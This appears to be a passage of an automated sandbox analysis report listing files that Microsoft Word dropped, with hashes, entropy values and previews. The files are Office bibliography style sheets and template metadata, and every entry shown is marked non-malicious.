                                                  Category:dropped
                                                  Size (bytes):302
                                                  Entropy (8bit):3.537169234443227
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                                                  MD5:9C00979164E78E3B890E56BE2DF00666
                                                  SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                                  SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                                                  SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):217137
                                                  Entropy (8bit):5.068335381017074
                                                  Encrypted:false
                                                  SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                  MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                  SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                  SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                  SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):332
                                                  Entropy (8bit):3.547857457374301
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                                                  MD5:4EC6724CBBA516CF202A6BD17226D02C
                                                  SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                                  SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                                  SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):284415
                                                  Entropy (8bit):5.00549404077789
                                                  Encrypted:false
                                                  SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                  MD5:33A829B4893044E1851725F4DAF20271
                                                  SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                  SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                  SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):314
                                                  Entropy (8bit):3.5230842510951934
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                                  MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                                  SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                                  SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                                  SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):294178
                                                  Entropy (8bit):4.977758311135714
                                                  Encrypted:false
                                                  SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                  MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                  SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                  SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                  SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):290
                                                  Entropy (8bit):3.5161159456784024
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                                  MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                                  SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                                  SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                                  SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):344303
                                                  Entropy (8bit):5.023195898304535
                                                  Encrypted:false
                                                  SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                  MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                  SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                  SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                  SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):286
                                                  Entropy (8bit):3.5502940710609354
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                                  MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                                  SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                                  SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                                  SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):270198
                                                  Entropy (8bit):5.073814698282113
                                                  Encrypted:false
                                                  SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                  MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                  SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                  SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                  SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):256
                                                  Entropy (8bit):3.464918006641019
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                                  MD5:93149E194021B37162FD86684ED22401
                                                  SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                                  SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                                  SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Word 2007+
                                                  Category:dropped
                                                  Size (bytes):51826
                                                  Entropy (8bit):5.541375256745271
                                                  Encrypted:false
                                                  SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                  MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                  SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                  SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                  SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                  Malicious:false
                                                  Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):278
                                                  Entropy (8bit):3.5280239200222887
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                                  MD5:877A8A960B2140E3A0A2752550959DB9
                                                  SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                                  SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                                  SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):268317
                                                  Entropy (8bit):5.05419861997223
                                                  Encrypted:false
                                                  SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                  MD5:51D32EE5BC7AB811041F799652D26E04
                                                  SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                  SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                  SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):374
                                                  Entropy (8bit):3.5414485333689694
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                                                  MD5:2F7A8FE4E5046175500AFFA228F99576
                                                  SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                                  SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                                  SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Word 2007+
                                                  Category:dropped
                                                  Size (bytes):47296
                                                  Entropy (8bit):6.42327948041841
                                                  Encrypted:false
                                                  SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                  MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                  SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                  SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                  SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                  Malicious:false
                                                  Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):288
                                                  Entropy (8bit):3.523917709458511
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                                                  MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                                  SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                                  SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                                  SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):296658
                                                  Entropy (8bit):5.000002997029767
                                                  Encrypted:false
                                                  SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                  MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                  SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                  SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                  SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):332
                                                  Entropy (8bit):3.4871192480632223
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                                  MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                                  SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                                  SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                                  SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                                  Malicious:false
